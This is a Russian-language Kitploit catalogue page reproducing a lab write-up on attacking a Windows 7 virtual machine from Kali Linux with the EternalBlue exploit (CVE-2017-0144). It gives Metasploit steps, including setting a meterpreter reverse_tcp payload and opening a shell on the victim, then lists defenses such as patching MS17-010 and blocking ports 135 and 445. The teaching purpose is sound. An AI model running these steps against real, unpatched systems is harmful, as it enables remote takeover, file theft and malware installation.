Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
SMB-Protocol-Vulnerability_CVE-2017-0144 | Kitploit
Инструменты/GitHubGitHub/luckyman2907/smb-protocol-vulnerability_cve-2017-0144
Анализ уязвимостейЭксплуатацияСетевая безопасностьТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubluckyman2907/smb-protocol-vulnerability_cve-2017-0144

SMB-Protocol-Vulnerability_CVE-2017-0144

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
1 год назадЕщё не проверено

ЛАБОРАТОРНАЯ РАБОТА: АТАКА НА ОПЕРАЦИОННУЮ СИСТЕМУ WINDOWS НА ОСНОВЕ УЯЗВИМОСТИ ПРОТОКОЛА SMB.

  • 1. ОПИСАНИЕ
  • 2. ОБЩЕЕ ВВЕДЕНИЕ
  • 3. ПОДГОТОВКА
  • 4. ПРОВЕДЕНИЕ АТАКИ
  • 5. СПОСОБЫ ЗАЩИТЫ

1. ОПИСАНИЕ

В этой лабораторной работе мы будем использовать два компьютера для имитации атаки, основанной на уязвимости в протоколе SMB операционной системы Windows. Один компьютер работает на операционной системе Kali Linux и играет роль злоумышленника (хакера). Второй компьютер играет роль машины-жертвы (жертвы). Машина-жертва работает на операционной системе Windows 7 64-bit и содержит уязвимость SMB. Для этого на машине Kali Linux мы будем использовать эксплойт под названием EternalBlue для атаки на машину Windows 7.

2. ОБЩЕЕ ВВЕДЕНИЕ

Server Message Block (SMB) — это довольно распространённый протокол обмена файлами на платформе Microsoft Windows. Благодаря этому протоколу SMB компьютеры Windows, подключённые друг к другу в пределах одной сети или одного домена, могут обмениваться файлами между собой. На сегодняшний день SMB также известен под другим названием — Common Internet File Sharing (CIFS).

EternalBlue — это эксплойт, использующий уязвимость протокола SMB через порт 445. Изначально EternalBlue был разработан Агентством национальной безопасности США (NSA). Полное английское название — U.S. National Security Agency. Однако позже, в 2017 году, он был обнародован группой хакеров The Shadow Brokens. В том же году по всему миру произошла масштабная атака вируса-шифровальщика – Ransomware, нацеленная на компьютеры Microsoft Windows. Самой известной из них остаётся вирус WannaCry. На сегодняшний день, хотя эта уязвимость уже была закрыта Microsoft с помощью обновления безопасности MS17-010, большое количество компьютеров в мире, работающих на операционной системе Windows, по-прежнему содержат эту уязвимость. Данная уязвимость зарегистрирована как CVE-2017-0144 (Windows SMB Remote Code Execution Vulnerability). Эта уязвимость чрезвычайно опасна и очень легко эксплуатируется. Примечательно, что для атаки через эту уязвимость протокола SMB хакеру не нужно ничего отправлять жертве или обманом заставлять её загружать и запускать какой-либо вредоносный вирус. То есть жертва, даже ничего не делая, всё равно может быть легко атакована хакером, который захватывает управление компьютером без какого-либо её ведома.

3. ПОДГОТОВКА

Подготовьте две виртуальные машины, работающие на программном обеспечении VMware Workstation:

  • Виртуальная машина Kali Linux (машина хакера) имеет IP-адрес: 192.168.198.140
  • Виртуальная машина Windows 7 (машина-жертва) имеет IP-адрес: 192.168.198.143

  1. На виртуальной машине Kali (атакующий):

    • Проверить IP-адрес: ifconfig
    • Запустить службу Postgresql: service postgresql start
    • Проверить, запущен ли postgresql, с помощью команды: service postgresql status
  2. На виртуальной машине Windows 7 (жертва):

    • Проверить IP-адрес: ipconfig
    • Отключить брандмауэр (Firewall)

4. ПРОВЕДЕНИЕ АТАКИ

  • На машине Kali: Войдите в Metasploit с помощью команды: msfconsole

  • После входа в Metasploit ищем уязвимости, а также синтаксис, связанный с ms17_010, с помощью команды: search ms17_010

  • Добавить IP-адрес машины-жертвы и машины атакующего
  • Настроить payload для эксплуатации: use 0 -> set payload windows/x64/meterpreter/reverse_tcp

  • Запустить exploit для проведения атаки
  • Открыть shell на машине жертвы (выполняется через терминал машины атакующего) после того, как удалось проникнуть в систему

=> На этом этапе можно считать, что хакер успешно проник в машину-жертву. Теперь хакер может удалять и похищать файлы с машины жертвы, не будучи замеченным. Более того, хакер может загружать и запускать вирусы прямо на этой машине.

5. СПОСОБЫ ЗАЩИТЫ

Чтобы избежать эксплуатации и злоупотребления протоколом SMB, необходимо выполнить несколько действий:

  • Включить брандмауэр (Firewall).
  • Обновить Windows до последней версии. Или загрузить и установить исправления безопасности Microsoft. Особенно исправление безопасности ms17_010.
  • Заблокировать порты 135, 445.
    • netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=135 name="Block_Cong_135"
    • netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name="Block_Cong_445"
Скачать инструмент